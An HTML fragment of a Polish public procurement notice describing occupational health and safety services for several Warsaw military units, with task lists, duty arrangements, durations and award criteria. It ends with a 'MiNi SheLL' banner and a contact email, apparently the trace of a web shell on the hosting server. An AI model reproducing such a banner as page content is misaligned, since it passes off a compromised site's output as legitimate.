<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1)	Przeprowadzanie kontroli warunków pełnienia służby oraz przestrzegania przepisów i zasad bezpieczeństwa i higieny pracy;
2)	Bieżące informowanie szefa zespołu o stwierdzonych zagrożeniach zawodowych, wraz 
z wnioskami zmierzającymi do usuwania tych zagrożeń;
3)	Sporządzanie i przedstawianie szefowi zespołu, co najmniej raz w roku, okresowych analiz stanu bezpieczeństwa i higieny pracy zawierających propozycje przedsięwzięć technicznych i organizacyjnych mających na celu zapobieganie zagrożeniom życia i zdrowia żołnierzy oraz poprawę warunków pełnienia służby;
4)	Opiniowanie szczegółowych instrukcji dotyczących bezpieczeństwa i higieny pracy 
na poszczególnych stanowiskach pracy;
5)	Opracowywanie innych niezbędnych dokumentów wynikających z obowiązujących przepisów prawnych w zakresie bezpieczeństwa i higieny pracy;
6)	Udział w ustalaniu okoliczności i przyczyn wypadków pozostających w związku z pełnieniem czynnej służby wojskowej oraz w opracowywaniu wniosków wynikających z badania przyczyn i okoliczności tych wypadków oraz zachorowań na choroby zawodowe, a także kontrola realizacji tych wniosków;
7)	Prowadzenie rejestrów, kompletowanie i przechowywanie dokumentów dotyczących wypadków związanych z pełnieniem czynnej służby wojskowej, stwierdzonych chorób zawodowych i podejrzeń o takie choroby, a także przechowywanie wyników badań i pomiarów czynników szkodliwych dla zdrowia w środowisku pracy;
8)	Doradztwo w zakresie stosowania przepisów oraz zasad bezpieczeństwa i higieny pracy;
9)	Udział w dokonywaniu oceny ryzyka zawodowego;
10)	Doradztwo w zakresie organizacji i metod pracy na stanowiskach służbowych, na których występują czynniki niebezpieczne lub szkodliwe dla zdrowia, oraz doboru najwłaściwszych środków ochrony zbiorowej i indywidualnej;
11)	Przeprowadzanie szkoleń z zakresu bezpieczeństwa i higieny pracy wraz ze sporządzeniem stosownej w tym zakresie dokumentacji wynikającej z odrębnych przepisów; a ponadto współpraca z właściwymi komórkami organizacyjnymi lub osobami, w zakresie organizowania i zapewnienia odpowiedniego poziomu szkoleń w dziedzinie bezpieczeństwa i higieny pracy;
12)	Współpraca z laboratoriami (upoważnionymi), do dokonywania badań i pomiarów czynników szkodliwych dla zdrowia lub warunków uciążliwych, występujących w środowisku pracy, w zakresie organizowania tych badań i pomiarów oraz sposobów ochrony żołnierzy przed tymi czynnikami lub warunkami;
13)	Współdziałanie z lekarzem sprawującym profilaktyczną opiekę zdrowotną nad żołnierzami, a w szczególności przy organizowaniu okresowych badań lekarskich pracowników;
14)	Uczestniczenie w konsultacjach w zakresie bezpieczeństwa i higieny pracy, a także w pracach komisji bezpieczeństwa i higieny pracy oraz innych zakładowych komisji zajmujących się problematyką bezpieczeństwa i higieny pracy, w tym zapobieganiem chorobom zawodowym i wypadkom związanych z pełnieniem czynnej służby wojskowej.
15)	Dyżur - (obsługa BHP) świadczona będzie w trybie ciągłym, natomiast jej rozliczenie będzie odbywać się raz w miesiącu (konkretny dzień miesiąca oraz godziny do odrębnego ustalenia) w siedzibie Zespołu ds. Służby 
w Międzynarodowych Strukturach Wojskowych w Warszawie przy ul. Radiowej 49..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 71.31.72.00-5.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> CZĘŚĆ III ZAMÓWIENIA 
DLA WOJSKOWEGO DOZORU TECHNICZNEGO - DELEGATURA W WARSZAWIE.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1)	Ocena i szacowanie ryzyka zawodowego na stanowiskach pracy żołnierzy zawodowych oraz pracowników wojska.
2)	Aktualizacja oceny ryzyka zawodowego w przypadku zmian organizacyjnych oraz wprowadzenia nowych urządzeń podlegających przepisom Dozoru Technicznego.
3)	Prowadzenie szkoleń wstępnych w zakresie BHP z nowo zatrudnionymi inspektorami.
4)	Prowadzenie szkoleń okresowych z całym składem osobowym.
5)	Przeglądy stanowisk pracy oraz opiniowanie zasadności użytkowania okularów korygujących wzrok przy pracy z monitorami ekranowymi.
6)	Wykonywanie rocznych sprawozdań z działalności w zakresie BHP.
7)	Dokonywanie analizy stanu BHP.
8)	Prowadzenie postępowań wyjaśniających w sprawie wypadków przy pracy oraz traktowanych na równi z wypadkami przy pracy (w drodze do/z pracy).
9)	Udział w komisjach mających na celu poprawy warunków pracy oraz zredukowania do minimum zagrożeń.
10)	Bieżące informowanie pracodawcy o stwierdzonych zagrożeniach zdrowia lub życia ludzi.
11)	Opiniowanie szczegółowych instrukcji dotyczących bezpieczeństwa i higieny pracy na poszczególnych stanowiskach pracy.
12)	Konsultacje oraz pomoc w zakresie zaopatrzenia pracowników w sprzęt ochronny, środki ochrony indywidualnej oraz odzież ochronną roboczą i specjalną.
13)	Kontrola przestrzegania przez pracowników przepisów BHP na stanowiskach pracy.
14)	Dyżur - (obsługa BHP) świadczona będzie w trybie ciągłym, natomiast jej rozliczenie będzie odbywać się raz w miesiącu (konkretny dzień miesiąca oraz godziny do odrębnego ustalenia) w siedzibie Wojskowego Dozoru Technicznego Delegatura w Warszawie przy ul. Radiowej 49..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 71.31.72.00-5.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 24.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> CZĘŚĆ IV ZAMÓWIENIA 
DLA SZEFOSTWA GEOGRAFII WOJSKOWEJ.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1)	Prowadzenie szkoleń (wstępnych i okresowych zgodnie z opracowanymi planami) z zakresu bezpieczeństwa i higieny pracy;
2)	Dokonywanie oceny ryzyka zawodowego na stanowiskach pracy zgodnie z obowiązującymi w tym zakresie przepisami prawa;
3)	Dokonywanie kontroli pracy oraz przestrzegania przepisów bhp na wszystkich stanowiskach pracy;
4)	Prowadzenie spraw w dochodzeniach powypadkowych oraz udział w składzie komisji powypadkowej, w tym opracowywanie wniosków wynikających z badania przyczyn i okoliczności wypadków przy pracy oraz zachorowań na choroby zawodowe, a także kontrola realizacji tych wniosków,
5)	Informowanie Szefa Geografii Wojskowej o stwierdzonych zagrożeniach zawodowych wraz z wnioskami zmierzającymi do usuwania tych zagrożeń;
6)	Sporządzanie i przedstawianie rocznej analizy bezpieczeństwa i higieny pracy w Szefostwie Geografii Wojskowej celem przesłania przełożonym;
7)	Udział w opracowaniu wewnętrznych zarządzeń i instrukcji dotyczących bhp;
8)	Prowadzenie i przechowywanie rejestrów, dokumentów wymaganych prawem;
9)	Występowanie do Szefa Geografii Wojskowej z wnioskami o spowodowanie usunięcia stwierdzonych zagrożeń i szkodliwości zawodowych oraz uchybień w zakresie bhp;
10)	Udział w prowadzonych kontrolach/nadzorach (w obszarze BHP) jednostek podległych Szefowi Geografii Wojskowej.
11)	Dyżur - (obsługa BHP) świadczona będzie osobiście dwa razy w miesiącu 
(w pierwszy i trzeci wtorek w godz. 7.30 - 15.30) w siedzibie SzGW w Warszawie przy ul. Al. Jerozolimskie 97;
a)Telefonicznie - w pozostałe dni możliwość niezwłocznej konsultacji telefonicznej, a przypadku, jeżeli charakter pytania wskazuje na konieczność dokonania analizy zdarzenia lub przepisów prawa w terminie nie dłuższym niż dwa dni robocze;
b) Za pomocą poczty elektronicznej lub faxu - w ciągu 2 dni roboczych od chwili wysłania;
c) Pocztą tradycyjną - w terminie 7 dni od dnia doręczenia..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 71.31.72.00-5.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com